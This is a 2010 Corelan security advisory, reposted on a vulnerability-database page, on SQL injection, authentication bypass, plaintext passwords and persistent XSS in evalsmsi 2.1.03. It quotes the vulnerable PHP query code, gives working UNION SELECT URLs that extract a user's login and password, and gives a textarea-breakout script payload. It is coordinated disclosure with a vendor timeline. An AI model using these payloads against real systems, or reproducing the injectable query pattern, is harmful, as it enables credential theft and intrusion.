Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Evalsmsi 2.1.03 SQL Injection / Bypass / Cross Site Scripting

🗓️ 05 Feb 2010 00:00:00Reported by corelanc0d3rType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 17 Views

evalsmsi 2.1.03 SQL Injection, Bypass, Cross-Site Scripting in PHP/MySQ

Code
`|------------------------------------------------------------------|  
| __ __ |  
| _________ ________ / /___ _____ / /____ ____ _____ ___ |  
| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |  
| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |  
| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |  
| |  
| http://www.corelan.be:8800 |  
| [email protected] |  
| |  
|-------------------------------------------------[ EIP Hunters ]--|  
| |  
| Vulnerability Disclosure Report |  
| |  
|------------------------------------------------------------------|  
  
Advisory : CORELAN-10-008  
Disclosure date : February 4th, 2010  
  
  
0x00 : Vulnerability information  
--------------------------------  
  
[*] Product : evalsmsi  
[*] Version : 2.1.03  
[*] URL : http://sourceforge.net/projects/evalsmsi/  
[*] Platform : PHP/MySQL  
[*] Type of vulnerability : SQL Injection, Authentication Bypass,   
Cross-Site Scripting  
[*] Risk rating : High  
[*] Issue fixed in version : 2.2.00  
[*] Vulnerability discovered by : ekse  
[*] Corelan Team is : corelanc0d3r, EdiStrosar, rick2600, mr_me, ekse, MarkoT,  
sinn3r, Jacky & jnz   
  
  
0x01 : Vendor description of software  
-------------------------------------  
From the vendor website:  
"evalSMSI is a web application, developed in PHP / MySQL, to evaluate the   
Information Security Management System for some entities."  
  
  
0x02 : Vulnerability details  
----------------------------  
evalsmsi 2.1.03 contains multiple vulnerabilities.  
  
  
1 - Insecure storage of password  
The passwords are stored in plaintext in the database.  
table : authentification   
column: password  
  
  
2 - Authentication Bypass   
While a valid username and password is needed to access the application, it is  
possible to make requests via ajax.php. It doesn't give access to much   
interesting information but the lack of authentication augments the risks  
associated with the following vulnerabilities.  
  
  
3 - SQL Injection   
SQL injection is possible via the script ajax.php  
  
The vulnerable code is the following (ajax.php, line 5):  
  
$id = $_GET['query'];  
$action = $_GET['action'];  
  
$base = evalsmsiConnect();  
switch ($action) {  
case 'sub_par':  
$request = "SELECT MAX(numero) FROM sub_paragraphe WHERE id_paragraphe="$id"";  
break;  
case 'question':  
$request = "SELECT * FROM sub_paragraphe WHERE id_paragraphe="$id"";  
break;  
case 'num_quest':  
$request = "SELECT MAX(numero) FROM question WHERE id_sub_paragraphe="$id"";  
break;  
default:  
break;  
  
As a proof-of-concept, it is possible to obtain the username and password   
(in plaintext) of the first user with the following requests :  
  
first user name  
http://server/evalsmsi/ajax.php?action=question&query=1%22%20UNION%20SELECT%20NULL%20,%20login,%20NULL,%20NULL,%20NULL%20FROM%20authentification%20UNION%20SELECT%20NULL%20,%20NULL,%20NULL,%20NULL,%20%22  
  
first user password  
http://server/evalsmsi/ajax.php?action=question&query=1%22%20UNION%20SELECT%20NULL%20,%20password,%20NULL,%20NULL,%20NULL%20FROM%20authentification%20UNION%20SELECT%20NULL%20,%20NULL,%20NULL,%20NULL,%20%22  
  
  
4 - Persistent Cross-Site Scripting  
  
It is possible to inject Javascript in the comment box of reports. Normally  
this would be less critical because you need a valid account to access reports.  
However, due the preceding vulnerabilities it is possible to obtain valid   
credentials.  
  
As a proof of concept, the following string can be inserted in the comment box :  
  
</textarea><script>alert('XSS found by Corelan Team');</script>  
  
  
  
0x03 : Vendor communication  
---------------------------  
[*] January 14th, 2010 - First contact  
[*] January 15th, 2010 - Vendor acknowledges the problems  
[*] January 20th, 2010 - Update request  
[*] February 1st, 2010 - Vendor update  
[*] February 4th, 2010 - Version 2.2.00 released  
  
Please note that the passwords are still stored in plaintext in the database  
with this release, yet the fix for the SQL Injection and authentication bypass  
are greatly lowering the risks.  
  
We wish to thank Michel Dubois for his cooperation in fixing the bugs we  
reported in a timely manner.  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 Feb 2010 00:00Current
evalsmsisql injectionbypasscross-site scriptingphpmysqlplain-text passwordsauthenticationpersistent xss
17